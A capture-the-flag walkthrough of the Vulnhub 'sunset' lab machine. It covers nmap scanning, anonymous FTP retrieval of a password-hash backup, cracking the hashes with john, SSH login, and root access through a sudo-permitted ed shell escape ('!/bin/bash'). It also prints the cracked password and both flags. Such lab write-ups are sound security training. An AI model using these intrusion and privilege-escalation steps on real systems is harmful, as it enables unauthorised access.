Vulnhub: sunset
This box is the first box in the sunset series. It is a very simple box, it only requires two steps to get root.
Scanning:
Finding the machine on the network
Nmap scan report for 192.168.56.130
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
More Scanning:
Getting more details
crazyeights@es-base:~$ nmap -A -p- 192.168.56.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 17:25 EST
Nmap scan report for 192.168.56.130
Host is up (0.00010s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.130:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
[SNIP]
FTP:
Log in to ftp as Anonymous
crazyeights@es-base:~$ ftp 192.168.56.130
Connected to 192.168.56.130.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.130:crazyeights): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Download the only file:
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.03 secs (39.7634 kB/s)
Check out the file backup we found:
crazyeights@es-base:~$ file backup
backup: ASCII text
crazyeights@es-base:~$ cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
The backup files appears to contain credentials of local users on the machine. We can use john to crack them.
Use john to crack the credentials:
The format of the hashes sha512crypt
crazyeights@es-base:~$ john --format=sha512crypt sunset_hash
Using default input encoding: UTF-8
Loaded 4 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
sky (sky)
Warning: Only 39 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 56 candidates buffered for the current salt, minimum 64 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 47 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 49 candidates buffered for the current salt, minimum 64 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
cheer14 (sunset)
-
The credentials sky:sky are not for anything.
-
Trying the credentials sunset:cheer14 on ssh
crazyeights@es-base:~$ ssh sunset@192.168.56.130
Getting user.txt:
sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
Privilege Escalation:
Finding what the user can run with elevated privileges:
sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunset may run the following commands on sunset:
(root) NOPASSWD: /usr/bin/ed
Looking up ed:
NAME
ed - line-oriented text editor
-
Looking up ed on GTFObins
-
It can be used to break out from restricted environments by spawning an interactive system shell.
ed
!/bin/sh
Getting root:
sunset@sunset:~$ sudo ed
!/bin/bash
root@sunset:/home/sunset# cd /root
Getting root flag:
root@sunset:~# ls
flag.txt ftp server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
FIN.